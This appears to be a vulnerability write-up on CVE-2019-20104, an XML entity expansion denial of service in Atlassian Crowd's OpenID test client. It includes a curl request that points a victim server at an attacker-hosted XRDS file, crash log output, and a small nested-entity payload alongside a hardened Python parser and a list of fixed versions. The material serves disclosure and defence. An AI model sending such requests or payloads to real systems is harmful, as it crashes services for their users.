Atlassian Crowd is a single sign-on and identity management product for web applications. Crowd ships with a built-in OpenID client intended for testing OpenID integrations. By pointing that test client at a URL that serves a malicious XRDS document, an attacker can remotely DoS the Crowd instance: the XML parser performs XML Entity Expansion until all memory is consumed and the application crashes.
After studying the OpenID protocol and understanding what kind of XML the client expects from an OpenID provider, I was able to craft the following XRDS response.
Proof of Concept XML XRDS payload:
Once the XRDS document is hosted on an attacker-controlled server, the following request makes the Crowd instance fetch and parse it, which triggers the payload:
curl -sik 'https://crowd.victim.tld/openidclient/login!login.action' --data 'openid_identifier=https%3A%2F%2Fattacker.com%2Fxrds.php'
The server then expands entities until the JVM heap is exhausted, and the Tomcat log fills with output such as the following (the interleaved lines are concurrent request threads dying at the same time):
Exception in thread "AsyncFileHandlerWriter-1300109446" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-7" java.lang.OutOfMemoryError: GC overhead limit exceeded
Exception in thread "http-nio-8095-exec-8" Exception in thread "http-nio-8095-exec-6" java.lang.OutOfMemoryError: Java heap space java.lang.OutOfMemoryError: Java heap space
Exception in thread "http-nio-8095-exec-4" java.lang.OutOfMemoryError: GC overhead limit exceeded
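To make the bug class concrete, here is a small added example written for this page; it is not Crowd's code and not the original PoC payload (which is far larger). A constructed, deliberately small XRDS document with four nested entity declarations is parsed two ways with Python's expat binding. The naive parser expands it exactly as a default-configured parser in the vulnerable client would, turning about 500 bytes of input into 3,000 bytes of character data; a real attack nests deeper until the heap is gone. The hardened parser rejects any DOCTYPE or entity declaration outright (an XRDS document fetched from an unknown OpenID identifier never legitimately needs one) and, as defence in depth, caps the total character data it will produce. The element and namespace names follow the XRDS/Yadis format; the 64 KiB budget and the example hostnames are assumptions.

```python
"""Entity-expansion demo and parser hardening for untrusted XRDS documents.

Constructed example for this write-up: not Crowd's code and not the original
PoC payload. Uses only the standard-library expat binding.
"""
import xml.parsers.expat as expat

# Constructed, deliberately small expansion document. Four levels of ten-fold
# nesting turn &d; into 1000 copies of "lol" (3,000 bytes). An attacker adds
# levels until the parser's heap is exhausted.
TOY_XRDS = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xrds [
  <!ENTITY a "lol">
  <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;&a;&a;">
  <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;&b;&b;">
  <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service>
      <Type>http://specs.openid.net/auth/2.0/server</Type>
      <URI>&d;</URI>
    </Service>
  </XRD>
</xrds:XRDS>
"""

# Constructed benign document, as a legitimate OpenID provider would serve it
# (hostname is an assumption).
BENIGN_XRDS = """<?xml version="1.0" encoding="UTF-8"?>
<xrds:XRDS xmlns:xrds="xri://$xrds" xmlns="xri://$xrd*($v*2.0)">
  <XRD>
    <Service>
      <Type>http://specs.openid.net/auth/2.0/server</Type>
      <URI>https://op.example/auth</URI>
    </Service>
  </XRD>
</xrds:XRDS>
"""


class UnsafeXMLError(Exception):
    """Raised when untrusted XML carries a DTD or exceeds its expansion budget."""


def _wire_uri_collector(parser, state):
    """Attach handlers that collect the text of the <URI> element into state."""

    def start(name, attrs):
        state["in_uri"] = (name == "URI")

    def end(name):
        if name == "URI":
            state["in_uri"] = False

    parser.StartElementHandler = start
    parser.EndElementHandler = end


def uri_text_naive(doc: str) -> str:
    """Parse like a default entity-expanding parser and return the <URI> text.

    This is the vulnerable behaviour: every entity reference is expanded in
    full before the application ever sees a byte of it.
    """
    parser = expat.ParserCreate()
    parser.buffer_text = True
    state = {"in_uri": False, "uri": []}
    _wire_uri_collector(parser, state)

    def chars(data):
        if state["in_uri"]:
            state["uri"].append(data)

    parser.CharacterDataHandler = chars
    parser.Parse(doc, True)
    return "".join(state["uri"])


def uri_text_hardened(doc: str, max_expanded_bytes: int = 64 * 1024) -> str:
    """Same parse, but refuse DOCTYPE/entity declarations and cap total output.

    Rejecting the DTD stops the attack before any expansion happens; the byte
    budget (assumed 64 KiB) is a second line of defence if a parser cannot be
    configured to refuse DTDs.
    """
    parser = expat.ParserCreate()
    parser.buffer_text = True
    state = {"in_uri": False, "uri": [], "seen": 0}
    _wire_uri_collector(parser, state)

    def reject_doctype(doctype_name, system_id, public_id, has_internal_subset):
        raise UnsafeXMLError("DOCTYPE not allowed in untrusted XRDS: %s" % doctype_name)

    def reject_entity(name, is_param, value, base, system_id, public_id, notation):
        raise UnsafeXMLError("entity declaration not allowed: %s" % name)

    def chars(data):
        state["seen"] += len(data)
        if state["seen"] > max_expanded_bytes:
            raise UnsafeXMLError("expansion budget of %d bytes exceeded" % max_expanded_bytes)
        if state["in_uri"]:
            state["uri"].append(data)

    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.CharacterDataHandler = chars
    parser.Parse(doc, True)
    return "".join(state["uri"])


if __name__ == "__main__":
    print("naive parser produced %d bytes of <URI> text" % len(uri_text_naive(TOY_XRDS)))
    print("hardened parser, benign doc:", uri_text_hardened(BENIGN_XRDS))
    try:
        uri_text_hardened(TOY_XRDS)
    except UnsafeXMLError as exc:
        print("hardened parser, toy payload: rejected (%s)" % exc)
```

The same two controls apply on the Java side that Crowd runs on: disallow the DOCTYPE declaration on the parser factory (or at least disable external and internal entity expansion) and bound the size of the response body fetched from the user-supplied identifier before it reaches the parser.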
Atlassian acknowledged the issue through its bug bounty program on Bugcrowd (bugcrowd.com/atlassian) and has issued fixes.
The issue is fixed in the following Crowd versions:
- 3.2.11
- 3.3.8
- 3.4.7
- 3.5.2
- 3.6.2
- 3.7.1
- 4.0.0
References (Atlassian Jira issue CWD-5526 and CVE-2019-20104):
https://jira.atlassian.com/browse/CWD-5526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20104
Happy Hunting 😊